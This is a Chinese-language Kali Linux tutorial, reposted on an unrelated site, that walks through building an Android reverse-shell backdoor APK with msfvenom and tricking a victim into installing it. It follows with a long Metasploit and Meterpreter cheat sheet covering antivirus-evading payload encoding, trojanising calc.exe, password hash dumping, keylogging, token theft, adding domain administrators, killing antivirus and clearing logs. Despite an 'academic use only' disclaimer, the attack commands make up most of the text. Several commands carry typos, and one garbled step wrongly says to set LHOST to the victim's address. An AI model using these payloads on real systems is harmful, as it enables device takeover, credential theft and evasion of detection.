Kali 下对安卓手机的攻击 |
您所在的位置:网站首页 › 荷鲁斯之眼项链会带来好运吗 › Kali 下对安卓手机的攻击 |
|
写在前面:本文仅限学术交流,请勿用他人实践 Kali对安卓手机的攻击(渗透) 我们首先需要确定本机IP 这很简单,对于Kali来说我们需要打开终端并键入 ifconfig即可获取自己的IP,然后我们需要确定安卓手机也就是被攻击者的IP,只需键入 fping -g 本机IP地址/24这时我们就能确定目标IP,这次教程主要围绕创建后门程序展开 在终端中执行: # msfvenom -p android/meterpreter/reverse_tcp LHOST=目标IP LPORT=接收的端口 > my_backdoor.apk将代码段中的“目标IP”改为刚刚确定的被攻击者的IP)这时就会创建一个后门程序,后缀名为.apk格式(也就是安卓的安装包格式)并发送到所指IP下的安卓系统中 接下来要启动Metasploit 这里使用以下命令 msf > use exploit/multi/handler > set payload android/meterpreter/reverse_tcp > set lhost 目标IP > set lport 接收端口 > exploit也就是“点对点打击”或者是“IP对IP” 这里我用安卓的虚拟机做了渗透 通过诱导虚拟机点开后门程序即可控制手机 当安卓手机点开木马(.apk)之后我们就获得了对肉鸡的控制权 使用help查看命令: 多例如: service apache2 start service postgresql start msfconsole启动 1.MSF终端命令 show exploit 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击模块。 search name 查找metasploit框架中的所有渗透攻击和其他模块。 info 展示出制定渗透攻击或模块的相关信息。 use name 装载一个渗透攻击或者模块。 LHOST 目标主机链接的IP地址。 RHOST 远程主机或者目标主机。 set function 设置特定的配置参数。 setg function 以全局方式设置特定的配置参数。 show options 列出某个渗透攻击或模块中所有的参数配置。 show targets 列出渗透攻击所支持的目标平台。 set target num 指定你所知道的目标的操作系统以及补丁版本类型。 set payload 指定想要使用的攻击载荷。 show advanced 列出所有高级配置选项。 set autorunscript migrate -f. 在渗透攻击完成后,将自动迁移到另一个进程。 check 检测目标是否对选定渗透攻击存在相应安全漏洞 exploit 执行渗透攻击或模块来攻击目标。 exploit -j 在计划任务下进行渗透攻击(攻击将在后台进行) exploit -z 渗透攻击成功后不与会话进行交互。 exploit -e encoder 制定使用的攻击载荷编码方式 exploit -h 列出exploit命令的帮助信息。 sessions -l 列出可用的交互会话(在处理多个shell时使用) sessions -l -v 列出所有可用的交互会话以及会话详细信息,例如:攻击系统时使用了哪个安全漏洞。 sessions -s script 在所有活跃的meterpreter会话中运行一个特定的meterpreter脚本。 sessions -K 杀死所有活跃的交互会话。 sessions -c cmd 在所有活跃的metaerpreter会话上执行一个命令。 sessions -u sessionID 升级一个普通的win32shell到meterpreter shell。 db_create name 创建一个数据库驱动攻击所要使用的数据库。 db_nmap 利用nmap并把所有扫描数据库存储到数据库中。 db_autopwn -h 展示出db_autopwn命令的帮助信息。 db_autopwn -p -r -e 对所有发现的开放端口执行db_autopwn,攻击所有系统,并使用一个反弹式shell。 db_destroy 删除当前数据库。 db_destroy user:password@host:port/database 使用高级选项来删除数据库。 2.metapreter命令 help 打开帮助 run scriptname 运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名。 sysinfo 列出受控主机的系统信息。 ls 列出目标主机的文件和文件夹信息。 use priv 加载特权提升扩展模块,来扩展meterpreter库。 ps 显示所有运行进程以及关联的用户账户。 migrate PID 迁移到一个指定的进程ID use incognito 加载inconito功能(用来盗取目标主机的令牌或是假冒用户) list_tokens -u 列出目标主机用户组的可用令牌。 impersonate_token DOMAIN_NAME\\USERNAME 假冒目标主机上的可用令牌。 steal_token 盗窃给定进程的可用令牌并进行令牌假冒。 drop_token 停止假冒当前的令牌。 getsystem 通过各种攻击向量来提升到系统用户权限。 shell 以所有可用令牌来运行一个交互的shell。 execute -f cmd.exe -i 执行cmd.exe命令并进行交互。 execute -f cmd.exe -i -t 以所有可用令牌来执行cmd命令。 execute -f cmd.exe -i -H -t 以所有可用令牌来执行cmd命令并隐藏该进程。 rev2self 回到控制目标主机的初始用户账户下。 reg command 在目标主机注册表中进行交互,创建,删除和查询等操作。 setdesktop number 切换到另一个用户界面(该功能基于那些用户已登录)。 screenshot 对目标主机的屏幕进行截图。 upload file 向目标主机上传文件。 download file 从目标主机下载文件。 keyscan_dump存储目标主机上或许的键盘记录。 getprivs 尽可能多的获取目标主机上的特权。 uietl enable keyboard/mouse 接管目标主机的键盘和鼠标。 background 将你当前的meterpreter shell转为后台执行。 hashdump 导出目标主机中的口令哈希值。 use sniffer 加载嗅探模块。 sniffer_interfaces 列出目标主机所有开放的网络接口。 sniffer_dump interfaceID pcapname 在目标主机上启动嗅探。 sniffer_start interfaceID packet_buffer 在目标主机上针对特定范围的数据包缓冲区启动嗅探。 sniffer_stats interfaceID 获取正在实施嗅探网络接口的统计数据 sniffer_stop interfaceID 停止嗅探。 add_user username password -h ip 在远程目标主机上添加一个用户。 add_group_user “Domain Adimins”username -h ip 将用户添加到目标主机的域管理员组中。 clearev 清除目标主机上的日志记录。 timestomp 修改文件属性,例如修改文件的创建时间(反取证调差)。 reboot 重启目标主机。 3.MSFpayload命令 msfpayload -h MSFpayload 的帮助信息。 msfpayload windows/meterpreter/bind_tcp O 列出所有可用的攻击载荷。 msfpayload windows/metarpreter/bind_tcp O. 列出所有windows/meterpreter/bind_tcp 下攻击载荷的配置项(任何攻击载荷都是可以配置的)。 msfpayload windows/metaerpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X>payload.exe 创建一个metarpreter的reverse_tcp 攻击载荷回连到192.168.1.5的443端口,将其保存为名为payload.exe的windows可执行程序。 msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R>payload.ray 与上面生成同样的攻击载荷,到导成原始格式的文件,该文件将在后面的MSFencode中使用。 msfpayload windows/meterpreter/bind_tcp LPORT=443 C>payload.c 与上面生成同样的攻击载荷,但导出成C格式的shellcode。 msfpayload windows/meterpreter/bind_tcp LPORT=443 J>payload.java 导出成以%u编码方式的javaScript语言字符串。 4.MSFencode命令 msfencode -h 列出MSFencode的帮助信息。 msfencode -l 列出所有可用的编码器。 msfencode -t(c,eif.exe,java,js_be,perl,raw,ruby,vba,vbs,loop-vbs,asp,war,macho) 显示编码缓冲区的格式。 msfencode -i payload.raw -o encoded_payload,exe -e x86/shikata_ga_nai -c 5 -t exe 使用 shikata_nai编码器对payload.raw文件进行5次编码,然后导出一个名为encoded_payload.exe的文件。 msfpayload windows/meterpreter/bind_tcp LPORT=443 R|msfencode -e x86/_countdown -c 5 -t raw|msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe 创建一个经过多种编码格式嵌套编码的攻击载荷。 msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c 创建一个纯字母 数字的shellcode,由ESI寄存器指向shellcode,以C语言格式输出。 5.MSFcli命令。 msfcli | grep exploit 仅列出渗透攻击模块。 msfcli | grep exploit/windows 仅列出与Windows相关的渗透攻击模块。 msfcli exploit/windows/smb/msf08_067_netapi PYALOAD=windows/meterpreter/bind_tcp LPORT=443 RHOST=172.16.32.142 E 对172.16.32.142 发起ms08_067_netapi渗透攻击,配置了bind_tcp攻击载荷,并绑定在443端口进行监听。 6.Metasploit高级忍术 msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R|msfencode -x calc.exe -k -o payload.exe -c x86/shikata_ga_nai -c 7 -t exe 创建一个反弹式的Meterpreter攻击载荷,回连到192.168.1.5 主机的443端口,使用calc.exe作为载荷后门程序,让载荷执行流一直运行在被攻击的应用程序中,最后生成以.shikata_ga_nai编码器编码后的攻击载荷可执行程序payload.exe。 msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R|msfencode -x calc.exe -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe 创建一个反弹式的meterpreter攻击载荷,回连到192.168.1.5主机的443端口,使用calc.exe作为载荷后门程序,不让载荷执行流一直运行在被攻击的应用程序中,同时在攻击载荷执行后也不会再目标主机上弹出任何信息。这种配置非常有用,当你通过浏览器漏洞控制了远程主机,并不想让计算机程序打开呈现在目标用户面前,同样,最后生成用.shikata_ga_nai 编码的攻击载荷程序payload.exe。 msfpayload windows/meterpreter/bind_tcp LPORT=443 R|msfencode -0 payload.exe -e x86/shikata_ga_nai -c 7 exe & & msfcli multi/bandler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E 创建一个raw格式的bind_tcp模式Meterpreter攻击载荷,用shikata_ga_nai编码7次,输出以payload.exe命名的windows可执行程序文件,同时启用多路监听方式进行执行。 7.MSFvenom 利用MSFvenom,一个集成套件,来创建和编码你的攻击载荷。 msfvenom --payload windows/meterpreter/reverse_tcp --format exe --encoder x86/shikata_ga_nai LHOST=172.16.1.32 LPORT=443 > msf.exe [*] x86/shikata_ga_nai succeeded with size 317(iteration=1) root://opt/framework3/msf3# 这一行命令就可以创建一个攻击载荷并自动产生出可执行文件格式。 8.Meterpreter后渗透攻击阶段命令。 在Windows主机上使用metarpreter进行提权操作。 meterpreter>use priv meterpreter>getsystem 从一个给定的进程ID中窃取一个域管理员组令牌,添加一个域账户,并把域账户添加到域管理员组中。 meterpreter>ps meterpreter>steal_token 1784 meterpreter>shell c:\windows\sysem32>user metasploit @password /ADD /DOMAIN c:\windows\sysem32>net group "Domain Admins" metasploit /ADD /DOMAIN 从SAM数据库中导出密码的哈希值。 meterpreter>use priv meterpreter>getsystem meterpreter>hashdump 提示:在widonws 2008中,如果getsystem命令和hashdump命令抛出异常情况时,你需要迁移到一个以SYSTEM系统权限运行的进程中。 自动迁移到一个独立进程。 meterpreter>run migrate 通过meterpreter的killav脚步来杀死目标主机运行的杀毒软件进程。 meterpreter>run kallav 针对一个特定的进程捕获目标主机上的键盘记录: meterpreter>ps meterpreter>migrate 1436 meterpreter>kayscan_start meterpreter>kayscan_start meterpreter>keyscan_dump meterpreter>kayscan_stop 使用匿名方式来假冒管理员: meterpreter>use incognito meterpreter>list_tokens -u meterpreter>use priv meterpreter>getsystem meterpreter>list_tokens -u meterpreter>impersonate_token IHAZSECURITY\\Admininistrator 查看目标主机都采取了那些防范保护措施,列出帮助菜单,关闭防火墙以及其它我们发现的保护措施。 meterpreter>run getcountermeasure meterpreter>run getcountermeasure -h meterpreter>run getcountermeasure -d -k 识别被控制的主机是否是一台虚拟机。 meterpreter>run checkvm 在一个meterpreter会话界面中使用cmd shell。 meterpreter>shell 获取目标主机的图形界面(VNC). meterpreter>run vnc 使正在运行的meterpreter界面在后台运行。 meterpreter>background 绕过windows的用户账户控制(UAC)机制。 meterpreter>run post/windows/escalate/bypassuac 导出苹果OS-X系统的口令哈希值。 meterpreter>run post/osx/gather/hashdump 导出linux系统的口令哈希值。 meterpreter>run post/linux/gather/hashdump根据目标选择需要的行为即可。 |
今日新闻 |
推荐新闻 |
| CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |